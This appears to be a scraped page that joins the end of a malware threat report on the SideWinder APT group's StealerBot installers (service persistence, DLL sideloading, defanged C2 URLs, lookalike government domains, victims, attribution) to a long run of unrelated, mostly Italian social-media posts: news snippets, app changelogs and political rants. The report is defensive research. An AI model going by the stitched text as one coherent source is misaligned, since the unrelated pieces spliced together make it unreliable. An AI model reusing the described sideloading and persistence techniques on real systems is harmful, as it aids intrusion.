During the investigation we found two more components, which are installers used to deploy the StealerBot on the systems. We didn’t observe them during the infection chain. They are probably used to install new versions of the malware or deploy the malware in different contexts on the same machine. For example, to infect another user.
InstallerPayload
The first component is a library developed in C++ that acts as a loader. The code is very similar to the “Downloader” component observed in the UAC bypass module. The library contains different payloads that are joined together at runtime and injected into the remote “spoolsv.exe” process.
The injected payload reflectively loads a library called “InstallerPayload.dll”, written in C++, to download additional components and maintain their persistence by creating a new Windows service.
The malware is configured to download the files from a predefined URL using WinHTTP. hxxps://pafgovt[.]com/mod/rnd/214/15109/14786/X6HPUSbM5luLGTzAhI12Ly8CfydiP869E F0mo673/1/1706084656128/x3l8o/2c821e The specific file to be downloaded is requested with a variable “name”, which is included in all GET requests. Each file is downloaded to a specific location:
Variable
Destination file path
?name=bp
%systemroot%\srclinks\%RANDOM_NAME% Example name: VacPWtys
?name=ps
%systemroot%\srclinks\write.exe or %systemroot%\srclinks\fsquirt.exe
?name=dj
%systemroot%\srclinks\devobj.dll or %systemroot%\srclinks\propsys.dll
?name=v3d
%systemroot%\srclinks\vm3dservice.exe
?name=svh
%systemroot%\srclinks\winmm.dll
?name=fsq
%systemroot%\srclinks\write.exe or %systemroot%\srclinks\fsquirt.exe
The specific filename changes according to the Windows version.
If the Windows build is lower than 10240 (Windows 10 build 10240), the malware installs the following files:
%systemroot%\srclinks\write.exe
%systemroot%\srclinks\propsys.dll
%systemroot%\srclinks\write.exe.config
%systemroot%\srclinks\vm3dservice.exe
%systemroot%\srclinks\winmm.dll
Otherwise:
%systemroot%\srclinks\fsquirt.exe
%systemroot%\srclinks\devobj.dll
%systemroot%\srclinks\fsquirt.exe.config
%systemroot%\srclinks\vm3dservice.exe
%systemroot%\srclinks\winmm.dll
The malware also creates a new Windows service named "srclink" to ensure that the downloaded files can start automatically when the system restarts. The service is configured to start automatically and run the following program: C:\WINDOWS\srclinks\vm3dservice.exe The file is a legitimate program digitally signed by VMware and is used by the attacker to sideload the malicious "winmm.dll" library. This is a library developed in C++ and named "SyncBotServiceHijack.dll" that exports all the functions normally exported by the legitimate “winmm.dll” library located in the system32 directory. All the functions point to a function that sleeps for 10 seconds and then raises a signal error and terminates execution.
Instructions used to raise an error
This is part of the persistence mechanism created by the attacker. The malicious Windows service created by the InstallerPayload component is configured to launch another program if the service fails.
Windows service properties
We may presume that the attacker uses this trick to bypass detection and sandbox technologies.
In this case, the service starts another program previously dropped by the malware: %systemroot%\srclinks\fsquirt.exe This is a legitimate Windows utility that provides the default GUI used by the Bluetooth File Transfer Wizard. This utility is used by the attacker to sideload another malicious library, "devobj.dll", which is a variant of the Backdoor loader module.
InstallerPayload_NET
This is another .NET library, which performs similar actions to the previously described InstallerPayload developed in C++. The main difference is that this malware embeds most of the files as resources.
Library
Hash
Description
devobjLoadAppDllx32
a7aad43a572f44f8c008b9885cf936cf
“Backdoor loader module” dropped as devobj.dll
fsquirt
ba54013cad72cd79d2b7843602835ed3
Legitimate program signed by Microsoft
Manage
f840c721e533c05d152d2bc7bf1bc165
Program to hijack Windows service
manifest
d3136d7151f60ec41a370f4743c2983b
XML manifest
propsysLoadAppDllx32
56e7d6b5c61306096a5ba22ebbfb454e
“Backdoor loader module” dropped as propsys.dll
Similar to InstallerPayload, the malware creates a new service that launches Manage.exe. Manage.exe is a simple program that sleeps for 20 seconds and then generates an exception. The service is configured to launch another program in case of failure. The second program, "fsquirt.exe" or "write.exe", is a legitimate application that is used to sideload a malicious library, the Backdoor loader module component. The encrypted file to be loaded by the Backdoor loader module component is downloaded from a remote server using a URL embedded in the code: hxxps://split.tyoin[.]biz/7n6at/g3mnr/1691394613799/f0f9e572 The received data are stored in a file with a random name and no extension.
Infrastructure
The attacker registered numerous domains using Hostinger, Namecheap, and Hosting Concepts as providers. They typically configure the malware to communicate with FQDN using specific subdomains with names that appear legitimate and are probably selected for relevance to the target. For example, the following is a small subset of subdomains used by the attacker.
Malicious domain or subdomain
Country
Legitimate domain
Legitimate owner
nextgen[.]paknavy-govpk[.]net
Pakistan
www.paknavy.gov.pk
Pakistan Navy
premier[.]moittpk[.]org
Pakistan
moitt.gov.pk
Ministry of Information Technology and Telecommunication of Pakistan
Ministry of Foreign Affairs, Kingdom of Saudi Arabia
mod-gov-bd[.]direct888[.]net
Bangladesh
mod.gov.bd
Ministry of Defence, Bangladesh
mmcert-org-mm[.]donwloaded[.]com
Myanmar
mmcert.org.mm
Myanmar CERT
opmcm-gov-np[.]fia-gov[.]net
Nepal
opmcm.gov.np
Office of the Prime Minister & Council of Ministers of Nepal
Each domain and its related subdomains are resolved with a dedicated IP address. The C2s are hosted on a VPS used exclusively by the attacker, but rented from different providers for a very short time. The attacker uses different service providers, but has a preference for HZ Hosting, BlueVPS, and GhostNET.
Victims
SideWinder targeted entities in various countries: Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka, Turkey and the United Arab Emirates.
Targeted sectors include government and military entities, logistics, infrastructure and telecommunications companies, financial institutions, universities and oil trading companies. The attacker also targeted diplomatic entities in the following countries: Afghanistan, France, China, India, Indonesia and Morocco.
Attribution
We attribute these activities to the SideWinder APT group with medium/high confidence. The infection chain observed in these attacks is consistent with those observed in the past. Specifically, the following techniques are similar to previous SideWinder activity:
The use of remote template injection, which is abused to download RTF files named “file.rtf” and forged to exploit CVE-2017-11882.
The naming scheme used for the malicious subdomains, which attempts to resemble legitimate domains that are of significance to the targets.
The .NET Downloader component and the Backdoor loader module are similar to those described in the past.
Last but not least, most of the entities targeted by the group are similar to those targeted by SideWinder in the past.
***More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.
[quote]Era l’ottobre del 1967 quando l’Outer space treaty (Ots), il trattato internazionale sui princìpi che governano le attività degli Stati in materia di esplorazione ed utilizzazione dello spazio extra-atmosferico, entrò in vigore. Il trattato, redatto all’inizio della space era e in piena
@Notizie dall'Italia e dal mondo Le esercitazioni coinvolgono caccia capaci di trasportare testate atomiche Usa. Proseguiranno per due settimane nei cieli di Belgio, Paesi Bassi, UK e Danimarca. Vi partecipano velivoli di 13 paesi tra cui l'Italia con i "Tornado"
[bitluni] seems rather fond of soldering lots of LEDs, and fortunately for us the result is always interesting eye candy. The latest iteration of this venture features 8 mm WS2812D-F8 addressable LEDs, offering a significant simplification in electronics and the potential for much brighter displays.
The previous version used off-the-shelf 8×8 LED panels but had to be multiplexed, limiting brightness, and required a more complex driver circuit. To control the panel, [bitluni] used the ATtiny running the MegaTinyCore Arduino core. Off-the-shelf four-pin magnetic connectors allow the panels to snap together. They work well but are comically difficult to solder since they keep grabbing the soldering iron. [bitluni] also created a simple battery module and 3D printed neat enclosures for everything.
Having faced the arduous task of fixing individual LEDs on massive LED walls in the past, [bitluni] experimented with staggered holes that allow through-hole LEDs to be plugged in without soldering. Unfortunately, with long leads protruding from the back of the PCB, shorting became an immediate issue. While he ultimately resorted to soldering them for reliability, we’re intrigued by the potential of refining this pluggable design.
The final product snapped together satisfyingly, and [bitluni] programmed a simple animation scheme that automatically updates as panels are added or removed. What would you use these for? Let us know in the comments below.
Un team di scienziati in Cina ha effettuato il primo attacco quantistico “efficace” al mondo contro un metodo di crittografia classico. L’attacco è stato effettuato utilizzando un computer quantistico standard della società canadese D-Wave Systems, scrive il South China Morning Post .
Gli scienziati sono riusciti a decifrare con successo algoritmi crittografici ampiamente utilizzati in settori critici come quello bancario e militare, avvertendo che il risultato rappresenta una “minaccia reale e significativa”.
Lo studio è stato condotto da Wang Chao dell’Università di Shanghai. Hanno attaccato gli algoritmi SPN (Substitution-Permutation Network) come Present, Gift-64 e Rectangle.
Gli algoritmi SPN sono alla base dello standard di crittografia AES (Advanced Encryption Standard), con AES-256 talvolta chiamato “standard militare” e considerato resistente agli attacchi quantistici.
I dettagli della metodologia dell’attacco rimangono poco chiari e Wang ha rifiutato di rivelare ulteriori dettagli in un’intervista al South China Morning Post a causa della “sensibilità” dell’argomento. Tuttavia, i ricercatori hanno avvertito che decifrare il codice è più vicino che mai.
“Questa è la prima volta che un vero computer quantistico rappresenta una minaccia reale e significativa per molti algoritmi SPN in uso oggi”, afferma un articolo sottoposto a revisione paritaria pubblicato sul Chinese Journal of Computers.
D-Wave Systems afferma di essere il primo fornitore commerciale al mondo di computer quantistici. Tra i suoi clienti figurano Lockheed Martin, NASA e Google.
La maggior parte dei sistemi quantistici universali esistenti non sono ancora considerati sufficientemente avanzati da rappresentare una minaccia per la crittografia moderna. Si prevede che le macchine quantistiche “utili” appariranno solo tra pochi anni.
Tuttavia, la potenziale capacità dei computer quantistici di risolvere problemi complessi e di violare la maggior parte degli algoritmi a chiave pubblica è motivo di preoccupazione. A questo proposito, si stanno compiendo sforzi per creare una crittografia “resistente ai quanti”.
All’inizio di quest’anno, il National Institute of Standards and Technology (NIST) ha rilasciato una serie di algoritmi di crittografia di base progettati per proteggere dai futuri attacchi informatici generati dai computer quantistici.
@Notizie dall'Italia e dal mondo Uccisi 10 palestinesi in fila per il cibo a Jabalia. La Associated Press rivela il "Piano dei Generali" per affamare il nord di Gaza L'articolo Decine di morti e feriti per i bombardamenti. “Piano dei Generali” per affamare il
Il recupero è avvenuto a seguito delle indagini iniziate nel 2021 dopo la denuncia di un furto presentata da un cittadino fiorentino al quale era stato sottratta da ignoti la “[b]De Historia Stirpium Commentarii Isignes”, manuale di botanica e medicina pubblicato a Basilea nel 1542 secondo gli studi del medico e botanico tedesco Leonhart Fuchs.
“Si tratta di un importante libro di botanica – riferisce il Maggiore Claudio Mauti, comandante del nucleo di Tutela Patrimonio Culturale dei carabinieri (TPC) di Firenze - che questa persona non ritrovava più nella sua collezione. Una ricerca che ci ha portato negli Usa perché a contatto con l'opera c'erano stati degli studiosi statunitensi risultati poi estranei ai fatti. Quindi nella nostra continua ricerca all'interno di aste online e vendite, abbiamo rintracciato l'opera che era finita nella disponibilità di un collezionista veneziano che non era a conoscenza dell'origine furtiva. Una ricerca che ci ha permesso di deferire 12 persone e alla quale ha collaborato l'Fbi”.
Tutto era cominciato nel 2018. Una famiglia benestante fiorentina assunto a lavorare un falegname fiorentino 50enne, il quale, lavori in corso, asportava via via dei libri di valore sostituendoli con altri di minore importanza.
Il falegname – per altro abile nel suo lavoro ufficiale – è stato poi assunto da altre famiglie proprietarie di lussuose dimore nobiliari. E qui sarebbe riuscito a mano a mano a portar via più di 600 opere che, sfruttando una rete di altre 11 persone costituita di commercianti e antiquari, riusciva a piazzar in tutto il mondo: Stati Uniti, Inghilterra, Emirati Arabi.
In un taccuino erano registrate le operazioni di vendita, che, ritrovato a seguito di una perquisizione, ha facilitato il lavoro degli investigatori.
Tra le opere rubate, numerose e pregevoli opere librarie, preziose ceramiche e vari dipinti, fra cui spiccano per importanza 4 piatti in ceramica bianca con decorazioni, recanti sul retro il timbro “Manifattura Ginori a doccia presso Firenze”, realizzate in esclusiva per la Presidenza della Repubblica italiana, un servizio in finissima porcellana con decorazioni in oro zecchino del 1820, un piatto della dinastia Ming tardo periodo Kangxi di fine XVII secolo, un dipinto raffigurante “bue” a firma Giovanni Fattori e l’opera libraria dal titolo “De Honesta Disciplina” con firma autografa di Giorgio Vasari.
Le opere saranno restituite ora ai proprietari, così come si tenterà di reimportarle altre, tramite il servizio Interpol, mediante azione stragiudiziale, per alcune legittimamente acquistate da ignari collezionisti stranieri.
@Politica interna, europea e internazionale L’accordo sui migranti tra Italia e Albania diventa operativo: oggi, lunedì 14 ottobre, la nave Libra della Marina Militare italiana ha fatto rotta verso le coste albanesi con a bordo il primo gruppo di persone soccorse in acque
@Politica interna, europea e internazionale La sesta sezione della Corte di Cassazione ha annullato la sentenza di assoluzione per 23 imputati del processo Ruby Ter. I giudici di legittimità hanno stabilito che si dovrà tenere un processo d’appello a Milano nei loro confronti per il reato di corruzione
#ITS, il Ministro Giuseppe Valditara ha partecipato questa mattina a Milano all’evento per celebrare i 10 anni di attività di ITS Academy Innovaprofessioni e all’inaugurazione dei primi due laboratori del gruppo Kering per l’alta formazione nel setto…
#ITS, il Ministro Giuseppe Valditara ha partecipato questa mattina a Milano all’evento per celebrare i 10 anni di attività di ITS Academy Innovaprofessioni e all’inaugurazione dei primi due laboratori del gruppo Kering per l’alta formazione nel setto…
Nacque a Londra, visse a Berlino, Parigi, Buenos Aires, Roma e Milano. Conobbe il mondo e dal mondo fu conosciuto e stimato. Discusse la tesi di laurea con il padre della politologia italiana, Gaetano Mosca; la pubblicò grazie all’interessamento di Benedetto Croce. Fu protagonista del salvataggio della Banca
CGUE: Meta deve "minimizzare" l'uso dei dati personali per gli annunci pubblicitari Con la sentenza odierna nella causa C-446/21 (Schrems contro Meta), la Corte di giustizia dell'Unione europea (CGUE) ha dato pieno appoggio a una causa intentata contro Meta per il suo servizio Facebook. mickey04 October 2024
[quote]Il fatto che il primo ministro israeliano, Benjamin Netanyahu, dica che la missione internazionale Unifil sia anch’essa uno “scudo umano” di Hezbollah, pone, come giustamente ha scritto su X anche il professor Germano Dottori, un dilemma: andarsene o farsi travolgere dalla guerra? Perché le azioni di
several improvements to list formatting and insertion, now even ordered lists are supported;
default opening mode for group accounts is now forum mode by default, but you can opt-out in settings and go back to the previous behaviour;
several improvements in the profile screen (e.g. scroll is retained across navigations), logging and account switch use cases have been improved as well;
fix vertical scroll in settings screen;
add empty message in user list;
fix spoilers closing immediately after opening;
added French and Spanish l10ns;
added more unit tests;
several dependency updates, migration to Kotlin 2.0.21.
Please let me know your opinions and feedback, in the meantime have a great week! #livefasteattrash 🦝🦝🦝
Moriva il feldmaresciallo tedesco Erwin Rommel, stratega ed innovatore nelle tattiche militari, ucciso dal veleno impostogli da Hitler, che lo sospettava di tradimento.
680 morti sul lavoro dall'inizio dell'anno. Gli ultimi due ieri in Friuli e Veneto l Articolo21
"Sono 680 dall’inizio dell’anno rivela l’Anmil, che celebra la 74esima giornata nazionale per le vittime sul lavoro. 23 decessi in più del 2023. Come se ogni anno svanisse dalla carta geografica un piccolo comune italiano. Oltre mille morti all’anno. Nelle fabbriche, in agricoltura. Molti dei quali prodotti dal sistema del subappalto e della logica degli appalti al massimo ribasso. La sicurezza subordinata alla competitività."
la natura è così per tutte le creature: ti spara nel mondo e poi sono **zzi tuoi. anche detto "volatili per diabetici". servirebbe più solidarietà tra viventi.
Nasce a Grantham, Lincolnshire, England, Margaret Thatcher. E' stata una politica; primo ministro del Partito conservatore britannico (1979-90); la prima donna primo ministro nella storia d'Europa. @Storia #otd
La disuguaglianza in Italia: come la crisi ha accentuato le disparità l World Politics Blog
"In Italia la disuguaglianza economica è cresciuta notevolmente rispetto ad altri paesi europei. La disparità di reddito, iniziata negli anni ’90 con privatizzazioni e appalti, si è acuita con le crisi del 2008 e del periodo pandemico, riducendo il potere d’acquisto delle classi più vulnerabili."
The breach does not appear to impact the main consumer Verizon network, and instead involves the company’s push to talk (PTT) product, marketed to public sector agencies and enterprises.#News #Hacking
Si è recentemente concluso presso il CoESPU dell' #Armadeicarabinieri di Vicenza il 1° Corso addestrativo dell' OSCE (Organizzazione per la sicurezza e la cooperazion in Europa, la più grande organizzazione di sicurezza regionale al mondo) basato sulla simulazione della lotta alla tratta di esseri umani nei flussi migratori misti nella regione del Mediterraneo. Durante un'intensa settimana, oltre 50 operatori anti-tratta provenienti da Stati @OSCE (membri e Partner per la cooperazione) hanno praticato la risoluzione di casi complessi, il coordinamento multi-agenzia ed approcci incentrati sulla vittima.
Gli operatori provenivano da Italia, Malta, Spagna, Algeria, Egitto e Tunisia. Lo scenario di formazione ha incorporato flussi migratori complessi e diversificati in più Stati, dimostrando come i gruppi criminali sfruttino la vulnerabilità insita dei migranti e degli sfollati (che si trovano in situazione di precarietà) per trafficarli verso lo sfruttamento lavorativo, lo sfruttamento sessuale o la criminalità forzata. La formazione ha riunito un'ampia gamma di professionisti provenienti da tutto l'ecosistema anti-tratta, tra cui pubblici ministeri, ispettori del lavoro, assistenti sociali, investigatori penali e finanziari, avvocati, operatori di ONG e funzionari dell'immigrazione. I partecipanti sono stati formati sui loro ruoli individuali, nonché su come collaborare efficacemente con le loro controparti nell'identificazione delle vittime di tratta e nell'individuazione, indagine e perseguimento dei reati di tratta di esseri umani. In questo contesto, gli operatori hanno avuto la possibilità di mettere in pratica e padroneggiare le loro competenze nella collaborazione multi-agenzia, applicando approcci incentrati sulla vittima e informati sul trauma.
"Poiché la sicurezza del Mediterraneo è indivisibile dalla sicurezza all'interno della regione OSCE in generale, l'esercitazione di addestramento basata sulla simulazione regionale del Mediterraneo ha dimostrato il valore duraturo e la collaborazione continua tra l'OSCE, gli Stati partecipanti e i Partner mediterranei per la cooperazione, e come il rafforzamento degli sforzi per combattere la tratta di esseri umani contribuisca a migliorare la sicurezza nell'intera regione", ha affermato la Dott. ssa Kari Johnstone, Rappresentante speciale e Coordinatrice dell'OSCE per la lotta alla tratta di esseri umani, nel suo discorso conclusivo.
Attuati per la prima volta nel 2016, i corsi di formazione basati sulla simulazione dell'OSCE sono uno strumento formativo estremamente rilevante per migliorare la capacità degli Stati partecipanti all'OSCE e dei partner per la cooperazione di identificare e assistere tempestivamente le presunte vittime della tratta di esseri umani, nonché di indagare e perseguire i responsabili attraverso l'uso di un approccio multi-agenzia, incentrato sulle vittime, informato sui traumi, sensibile alle questioni di genere e basato sui diritti umani.
Questa attività è stata realizzata con il sostegno finanziario dei governi di Francia, Germania, Irlanda, Lussemburgo, Liechtenstein, Malta, Monaco, Svizzera e Stati Uniti, nonché della Repubblica Italiana.
Finanziaria 2025: manovra di classe l La Città Futura
«Giorgetti presenta la manovra finanziaria per il 2025, in cui si prevedono tagli alla spesa pubblica e privatizzazioni. Il governo “sovranista” svende il Paese a BlackRock. Insufficienti, invece, i fondi stanziati per la sanità e i salari del pubblico impiego. Aumenteranno le accise sul gasolio, con ricadute sui prezzi delle merci.»
Siamo costretti? Quest'uomo ha perso qualsiasi briciolo di dignità e rispetto. Senza "palle", senza vergogna vile servo inutile alla nazione. imolaoggi.it/2024/10/11/ucrain…
''tristezza nel vedere immense quantità di risorse finanziarie per l'acquisto di armi, sottraendole a impieghi di carattere sociale'', ha detto Mattarella
@RaccoonForFriendica features/improvements I'll be considering for the next beta release:
improve login flow with more detailed error and progress indications;
state management in profile screen (scroll state is lost after navigating back and forth);
fix bug due to which spoilers are hidden again shortly after having been expanded.
Let me know if you find other bugs or have any requests, I am planning to fix as much as possible to get to a stable release in the following weeks (the time required may vary depending on the amount of issues found).
Addendum: add a switch in app Settings to open groups(*) in forum mode by default, with the ability to switch back to classic mode if wanted (i.e. maintain the ability to switch when opened, but make the default mode configurable).
The reason to motivate this change is to give more prominence to the forum mode, a feature which is a peculiarity of Friendica and of the Raccoon app as well.
(*) Friendica groups, Guppe groups, any entity confirming to an ActivityPub group.
Oggi, Dr. Polivers*, l’amministratore occulto di Poliversity.it non ha solo aggiornato il sistema alla nuova release di Mastodon, ma ha anche fatto di più. Il sistema infatti è stato aggiornato alla Mastodon glitch-soc, un fork amichevole del software di microblogging più usato nel Fediverso. Questo fork è stato pensato per fornire funzionalità aggiuntive molto interessanti…
Poliversity.it evolve grazie a Mastodon Glitch-soc, un fork amichevole. Poliversity consentirà quindi post lunghi fino a 9999 caratteri, formattazione del testo, scrittura di messaggi visibili solo in locale, modalità thread e… gli scarabocchi
Poliversity.it evolve grazie a Mastodon Glitch-soc, un fork amichevole. Poliversity consentirà quindi post lunghi fino a 9999 caratteri, formattazione del testo…
Hanno scritto al ministro degli esteri israeliano e sapete che ci avrà fatto con quella lettera? Il governo italiano vale meno del tappeto del cesso della casa Bianca. Nuovi attacchi mirati alle basi ONU, quindi ONU e Nato che faranno? Siccome non si tratta della Russia, (14 pacchetti di sanzioni propinati ai russi contro 0 sanzioni a Israele), mi piacerebbe sapere cosa faranno.
Ieri l'unica democrazia del Medio Oriente ha fatto uno sgambetto ai suoi amici che ora sono nel panico più totale. Alla fine è finita come quando provi a dire "NO" deciso al tuo gatto che ti guarda con disprezzo, si gira e ti piscia comunque sulle piante.
This is Behind the Blog, where we share our behind-the-scenes thoughts about how a few of our top stories of the week came together. This week, we discuss a sensitive data breach, the terrible process of sorting and sending job applications, and how Wikipedia is battling AI slop.#BehindTheBlog
@Thomas the OAuth2 login flow requires a browser to enter the credentials in the web form, I'll add a more informative error message in case something goes wrong.
In previous versions there was a healthcheck issue, which resulted in the instance field not being considered valid, but in that case an "Invalid field" message should appear below the text field, the issue you describe looks different.
Edit: the flow requires a first network call to register an application (POST v1/apps) and then it opens the web page in the browser. Things can either go wrong in the first step (the post call) or whether the browser can not be opened. I'll add more error messages in a future release.
Dopo due settimane di convivenza con il mio compagno da oggi finalmente sono di nuovo da sola. Respiroooooooo! E faccio tutto quello che non potevo fare con lui. Guardare le mie serie in inglese anziché doppiate in tedesco. Leggere un libro in silenzio. Mangiare poco e leggero. Dormire svaccata nel mio letto. Aaaaaah!
Ci sarà tempo tra qualche giorno per ritrovare la gioia di rivedersi, ma per adesso mi godo la quiete.
𝔻𝕚𝕖𝕘𝕠 🦝🧑🏻💻🍕
in reply to 𝔻𝕚𝕖𝕘𝕠 🦝🧑🏻💻🍕 • •Addendum: add a switch in app Settings to open groups(*) in forum mode by default, with the ability to switch back to classic mode if wanted (i.e. maintain the ability to switch when opened, but make the default mode configurable).
The reason to motivate this change is to give more prominence to the forum mode, a feature which is a peculiarity of Friendica and of the Raccoon app as well.
(*) Friendica groups, Guppe groups, any entity confirming to an ActivityPub group.
RaccoonForFriendica reshared this.